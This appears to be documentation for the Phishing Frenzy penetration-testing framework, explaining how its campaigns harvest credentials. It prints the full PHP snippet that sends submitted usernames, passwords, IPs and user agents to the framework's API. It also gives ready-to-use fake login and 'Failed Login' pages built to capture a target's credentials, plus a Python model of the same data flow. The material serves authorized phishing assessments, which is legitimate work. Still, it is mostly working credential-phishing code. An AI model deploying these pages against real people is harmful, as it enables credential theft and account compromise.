Credential Harvesting


Phishing Frenzy supports harvesting credentials as part of your email phishing campaigns, so there is no need to write your own PHP or other server-side code to capture them. Harvested credentials are stored in the Phishing Frenzy database through an API that the framework exposes for exactly this purpose.

That API is exposed solely to capture phishing credentials. As a penetration tester, all you need to do is use the framework in its intended fashion and the credentials are collected for you.

The video below demonstrates how to create and configure a new template for harvesting credentials. The remainder of this guide follows along with that demonstration.

When a campaign goes active within Phishing Frenzy, some fundamental processes occur on the backend. For the phishing website, every file with a .php extension has a small PHP snippet prepended to it. That snippet is shown below, followed by an explanation of what it is used for and how we can leverage it.

<?php
// Turn off all error reporting so the target never sees a PHP notice.
error_reporting(0);

// Every request must carry the per-target uid that Phishing Frenzy embeds in
// the phishing link; without it, answer with a plain 404 and do nothing.
if (isset($_GET['uid'])) {
  $uid = $_GET['uid'];
} else {
  header($_SERVER['SERVER_PROTOCOL'] . ' 404 Not Found', true, 404);
  echo "404 Page Not Found";
  exit();
}

// Best-effort client IP: a syntactically valid IPv4 in X-Forwarded-For is
// preferred over REMOTE_ADDR. Note that the header is supplied by the client
// (or a proxy in front of the server), so it is not authoritative.
function get_ip() {
  if (function_exists('apache_request_headers')) {
    $headers = apache_request_headers();
  } else {
    $headers = $_SERVER;
  }
  if (array_key_exists('X-Forwarded-For', $headers) && filter_var($headers['X-Forwarded-For'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
    $the_ip = $headers['X-Forwarded-For'];
  } elseif (array_key_exists('HTTP_X_FORWARDED_FOR', $headers) && filter_var($headers['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
    $the_ip = $headers['HTTP_X_FORWARDED_FOR'];
  } else {
    $the_ip = filter_var($_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4);
  }
  return $the_ip;
}

// The form fields are read by their fixed names; only a non-empty password
// counts as a credential submission.
$password = isset($_POST['PasswordForm']) ? $_POST['PasswordForm'] : '';
$username = isset($_POST['UsernameForm']) ? $_POST['UsernameForm'] : '';

$creds = '';
if ($password != '') {
  $creds = 'user:' . $username . ' password:' . $password;
}

$ip = get_ip();
$browser = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$host = $_SERVER['HTTP_HOST']; // collected but not sent to the API
// The <%= ... %> tag is ERB: Phishing Frenzy fills in the configured site URL
// when the campaign is activated, so the request goes back to the framework.
$url = "<%= GlobalSettings.first.site_url %>" . '/reports/results/';
$data = array('uid' => $uid, 'browser_info' => $browser, 'ip_address' => $ip, 'extra' => $creds);

// use key 'http' even if you send the request to https://...
$options = array(
  'http' => array(
    'header'  => 'Content-type: application/x-www-form-urlencoded',
    'method'  => 'POST',
    'content' => http_build_query($data),
  ),
);
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
?>

The snippet first requires a uid query parameter, which Phishing Frenzy embeds in each target's phishing link; a request without one receives a 404 and nothing is recorded. It then reads the POSTed PasswordForm and UsernameForm fields and, if a non-empty password was submitted, formats the pair as a single string for the Phishing Frenzy API.

The remainder of the PHP gathers the uid, the browser's User-Agent, the client IP address and the credential string into a single $data array and POSTs it to the /reports/results/ endpoint of the configured site URL, which is responsible for writing the record to the database. Two details matter in practice. First, the POST is made on every page load that carries a uid, not only on form submissions, so a plain visit to the landing page is recorded as a hit with an empty extra field. Second, get_ip() prefers an X-Forwarded-For header over REMOTE_ADDR whenever that header holds a syntactically valid IPv4 address, so the recorded ip_address is whatever the client or an intermediate proxy chose to send and should not be treated as a verified source address.
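To make the data flow concrete, here is an added Python model of what the prepended snippet does with one request to a template page. It is not Phishing Frenzy code and is not something you upload to the framework; it reimplements the snippet's logic so the payload that would reach /reports/results/ can be inspected offline. The site URL and the sample requests are constructed for the example, and the hostname is hypothetical.

```python
"""Model of the prepended Phishing Frenzy snippet: request in, API payload out.

Added example, not project code. It reproduces the uid check, the fixed form
field names, the X-Forwarded-For preference and the form body built by
http_build_query, using constructed sample requests.
"""
import ipaddress
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumed stand-in for what Phishing Frenzy substitutes into
# "<%= GlobalSettings.first.site_url %>" (hypothetical host).
SITE_URL = "https://phishing-frenzy.example"


def is_ipv4(value):
    """Same acceptance as filter_var(..., FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)."""
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        # Rejects "", garbage and comma-separated lists such as "a, b".
        return False


def client_ip(headers, remote_addr):
    """Mirror get_ip(): a syntactically valid IPv4 in X-Forwarded-For wins over
    REMOTE_ADDR, even though that header is chosen by whoever sends the request.
    `headers` is a dict keyed by lower-case header name."""
    xff = headers.get("x-forwarded-for", "")
    if is_ipv4(xff):
        return xff
    return remote_addr if is_ipv4(remote_addr) else ""


def handle_request(method, url, headers, body, remote_addr):
    """Model one hit on a template page.

    Returns (status, api_url, data): status 404 with no payload when the uid
    is missing, otherwise 200 plus the fields the snippet POSTs to the API.
    """
    query = parse_qs(urlsplit(url).query)
    if "uid" not in query:
        return 404, None, None
    uid = query["uid"][0]

    # The snippet reads exactly two field names, and only from the POST body.
    form = parse_qs(body) if method == "POST" else {}
    username = form.get("UsernameForm", [""])[0]
    password = form.get("PasswordForm", [""])[0]
    creds = ""
    if password != "":
        creds = "user:%s password:%s" % (username, password)

    data = {
        "uid": uid,
        "browser_info": headers.get("user-agent", ""),
        "ip_address": client_ip(headers, remote_addr),
        "extra": creds,
    }
    return 200, SITE_URL + "/reports/results/", data


def encode_payload(data):
    """The application/x-www-form-urlencoded body, as http_build_query builds it."""
    return urlencode(data)


if __name__ == "__main__":
    # Constructed sample: the target submits login.php's form, and the request
    # carries an X-Forwarded-For header that the snippet will trust.
    status, api_url, data = handle_request(
        "POST", "/process.php?uid=42",
        {"user-agent": "Mozilla/5.0", "x-forwarded-for": "203.0.113.9"},
        "UsernameForm=alice&PasswordForm=hunter2",
        "198.51.100.7",
    )
    print(status, api_url)
    print(encode_payload(data))
```

Running the sample shows the recorded ip_address is the X-Forwarded-For value rather than the real peer 198.51.100.7, and that a GET of the landing page with a uid still produces a payload, just with an empty extra field. If accurate source addresses matter for your report, record REMOTE_ADDR alongside the snippet's value in your own page logic or at the web server.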

Now that we understand what this snippet does, let's go over how we can leverage it to assist with the credential harvesting process.

Once we have created the initial template within Phishing Frenzy, we will need to upload some website files through the web UI. The two files that we will focus on in this guide are "login.php" and "process.php", which can be seen below.

The initial landing page "login.php" acts as a simple login portal that asks the target for a username and password. The second page, "process.php", receives the credentials from the login page; the prepended snippet stores them in the database.

login.php

<html>
<body>

<!-- $uid is set by the snippet Phishing Frenzy prepends to this file. It is
     carried into the form action so process.php can attribute the submission
     to the right target. The input names must match what the snippet reads. -->
<form method="POST" action="process.php?uid=<?php echo $uid ?>" name="LoginForm" autocomplete="off">
  Username: <input type="text" name="UsernameForm"><br>
  Password: <input type="password" name="PasswordForm"><br>
  <input type="submit" class="submit" value="Login">
</form>

</body>
</html>

Pay close attention to the action of the form. This is crucial because it determines where the parameters are sent: $uid travels in the query string, and the UsernameForm and PasswordForm values travel in the POST body. This snippet will almost always be used when credential harvesting with Phishing Frenzy, because it takes care of passing $uid, which is the key to correlating which target entered credentials into the phishing site.

action="process.php?uid=<?php echo $uid ?>"

By the time your second page "process.php" loads, the credentials have already been harvested, because the PHP snippet we reviewed earlier runs before the page body and sends them to the API.

process.php

<html>
<body>

<p>Failed Login</p>

<!-- Re-prompt the target. The action must point at a .php file so the
     prepended snippet runs again and captures a second attempt. -->
<form method="POST" action="process.php?uid=<?php echo $uid ?>" name="LoginForm" autocomplete="off">
  Username: <input type="text" name="UsernameForm"><br>
  Password: <input type="password" name="PasswordForm"><br>
  <input type="submit" class="submit" value="Login">
</form>

</body>
</html>

We hope this simple login page example gives you a basic understanding of how Phishing Frenzy can be leveraged to harvest credentials on your next phishing engagement.